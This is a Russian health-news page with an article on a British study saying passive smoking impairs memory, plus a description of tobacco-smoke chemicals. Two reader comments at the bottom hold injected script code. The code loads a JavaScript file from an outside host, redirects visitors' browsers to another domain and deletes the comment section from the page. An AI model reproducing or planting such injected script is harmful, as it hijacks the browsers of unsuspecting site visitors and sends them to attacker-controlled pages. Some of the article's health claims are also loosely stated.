Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пассивное курение «убивае...  >>  Пассивное курение «убивает» вашу память
 
Обратная связь
 

Пассивное курение «убивает» вашу память

Размер шрифта
10 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Британские ученые установили, что пассивное курение существенно ухудшает память и работу мозга.

пассивное курение

Что такое пассивное курение

Пассивное курение – это вдыхание воздуха, в котором содержатся продукты сгорания табака. Вредные вещества попадают в организм некурящего человека, главным образом, в закрытом помещении. Пассивное курение является причиной развития различных заболеваний и, прежде всего, рака легких, а также заболеваний сердечно-сосудистой и дыхательной систем, ЛОР-органов.

Особый вред вдыхание табачного дыма наносит детскому организму. Пассивное курение у детей увеличивает риск развития инфекционных заболеваний легких, в т.ч. туберкулеза, бронхиальной астмы, аллергических заболеваний, болезни Крона и оказывает негативное влияние на умственное и физическое развитие ребенка.

Состав табачного дыма

В сигаретном дыме содержится более 4 тысяч различных химических соединений, в том числе более 40 канцерогенных веществ. Сигаретный дым состоит из газообразных составляющих и твердых частиц. К газообразным компонентам относятся: оксид и диоксид углерода, синильная кислота, аммоний, изопрен, ацетальдегид, акролеин, нитробензол, ацетон, сероводород, синильная кислота и др.

Способность оксида углерода соединяться с гемоглобином в 200 раз выше, чем у кислорода, поэтому организм страдает от кислородного голодания. Синильная кислота приводит к нарушению внутриклеточного и тканевого дыхания. Выведение из организма метаболитов акролеина может привести к воспалению мочевого пузыря – циститу.

Фаза табачного дыма, содержащая твердые частицы, включает в основном никотин, воду и смолу – табачный деготь. Никотин легко проникает в кровь, накапливается в жизненно важных органах и приводит к нарушению их функций. Стоит упомянуть при этом, что никотин в три раза более токсичен, чем мышьяк.

Суть исследования

Участники исследования были разделены на три группы: курильщики, некурящие люди, регулярно подвергающиеся воздействию табачного дыма, и некурящие люди, не подвергающиеся воздействию табачного дыма. Некурящие люди, которые регулярно подвергались воздействию табачного дыма, жили с курильщиками или проводили с ними большое количество времени.

Ученые исследовали память всех участников и выяснили, что пассивное курение приводит к снижению памяти на 20%, а активное – на 30%. Таким образом, результаты исследования свидетельствуют о том, что пассивное курение оказывает существенное влияние на мыслительные функции и память.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Диагноз «рак легких» ставят по дыханию   Пассивное курение делает детей умственно отсталыми   Хроническая обструктивная болезнь легких   Пассивное курение приводит к ожирению!  
12 октября 2012Яичный желток опасен для сосудов так же, как курение! 09 октября 2012Пассивное курение «убивает» вашу память!
 
08 октября 2012Диагноз «рак легких» ставят по дыханию! 02 октября 2012Пассивное курение делает детей умственно отсталыми!
 

Слайдшоу

1
Самый легкий орган
Акция «Москвичи за город без табачного дыма»
Что не дает вам уснуть

Тесты

1
Как контролировать бронхиальную астму у детей
Как контролировать бронхиальную астму
Легкие: что вы о них знаете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.